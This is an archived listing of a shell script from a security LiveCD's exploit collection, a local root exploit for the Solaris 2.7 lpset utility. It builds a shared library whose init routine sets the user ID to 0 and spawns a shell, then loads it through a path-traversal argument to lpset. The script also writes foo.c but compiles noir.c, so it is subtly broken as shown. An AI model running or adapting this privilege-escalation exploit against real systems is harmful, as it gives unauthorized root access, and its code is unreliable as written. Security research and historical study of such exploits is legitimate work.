home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / solaris / local / lpset.sh < prev    next >
Encoding:
Linux/UNIX/POSIX Shell Script  |  2005-02-12  |  626 b   |  32 lines
  1. #!/bin/sh
  2. #
  3. # /usr/bin/lpset vulnerability in Solaris/SPARC 2.7
  4. # script by noir@gsu.linux.org.tr
  6. # lpset seems to use strcat to append paths (-r) 
  7. # but there is a special case /usr/lib/print/lib has to be present
  8. #
  9.  
  10. cat > foo.c << EOF
  11. #include <stdlib.h>
  12. #include <unistd.h>
  13. void
  14. _init(void)
  15. {
  16.         setuid(0);
  17.         system("/bin/sh");
  18. }
  19. EOF
  20.  
  21. echo "Compiling ..."
  22.  
  23. gcc -fPIC -c noir.c -g -DSOLARIS -Wall
  24. ld -G -o noir.so noir.o -ldl
  25.  
  26. chmod 755 noir.so
  27.  
  28. rm -f noir.c
  29. rm -f noir.o
  30.  
  31. /usr/bin/lpset -n xfn -r /../../../..$PWD/noir noir
  32. #                    www.hack.co.za            [2000]#